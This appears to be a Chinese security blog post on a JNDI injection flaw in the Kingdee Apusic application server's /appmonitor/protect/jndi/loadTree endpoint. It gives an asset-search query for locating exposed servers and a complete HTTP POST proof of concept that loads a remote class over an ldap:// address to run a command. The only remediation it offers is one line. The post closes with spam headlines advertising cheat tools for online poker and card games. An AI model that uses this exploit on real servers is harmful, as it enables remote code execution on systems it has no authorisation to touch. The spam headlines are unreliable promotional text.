金蝶Apusic应用服务器 loadTree JNDI注入漏洞
创始人
2025-01-16 13:36:29
0

产品介绍

金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

漏洞概述

由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。

资产测绘

app.name=“Apusic 金蝶天燕 Server”

漏洞复现

在这里插入图片描述
测试POC:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1 Host: your_ip Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 55  jndiName=ldap://***.***.***.***/Basic/Command/calc 

弹出计算器进行验证
在这里插入图片描述

修复建议

官方已发布漏洞补丁,请联系软件厂商进行修复。

相关内容

热门资讯

推荐透视!智星菠萝可以辅助吗,... 推荐透视!智星菠萝可以辅助吗,约局吧德州可以透视吗(透视)确实一直总是有辅助神器(哔哩哔哩)约局吧德...
透视项目!wpk俱乐部有没有辅... 透视项目!wpk俱乐部有没有辅助(透视)都是是真的辅助工具(哔哩哔哩)亲,关键说明,wpk俱乐部有没...
一直以来!哥哥打大a有辅助吗,... 一直以来!哥哥打大a有辅助吗,真是真的有辅助下载(有挂教学)-哔哩哔哩1、每一步都需要思考,不同水平...
解迷透视!德州私人局脚本,po... 解迷透视!德州私人局脚本,poker红龙辅助(透视)一直是有辅助技巧(哔哩哔哩)德州私人局脚本透视方...
透视妙计!pokemmo手机版... 透视妙计!pokemmo手机版脚本免费(透视)一贯有辅助神器(哔哩哔哩)1、pokemmo手机版脚本...
更值得关注的是!微乐小程序授权... 更值得关注的是!微乐小程序授权,一直是真的辅助软件(今日头条)-哔哩哔哩1、很好的工具软件,可以解锁...
曝光透视!红龙poker作必弊... 曝光透视!红龙poker作必弊指令,pokemmo辅助工具(透视)一贯一直总是有辅助方法(哔哩哔哩)...
透视诀窍!智星菠萝可以辅助吗(... 透视诀窍!智星菠萝可以辅助吗(透视)其实存在有辅助app(哔哩哔哩)1、让任何用户在无需智星菠萝可以...
围绕透视问题!微信小程序微乐辅... 围绕透视问题!微信小程序微乐辅助器免费下载,其实存在有辅助修改器(确实有挂)-哔哩哔哩1、不需要AI...
揭露透视!竞技联盟辅助,soh... 揭露透视!竞技联盟辅助,sohoo辅助(透视)都是真的是有辅助app(哔哩哔哩)1、这是跨平台的竞技...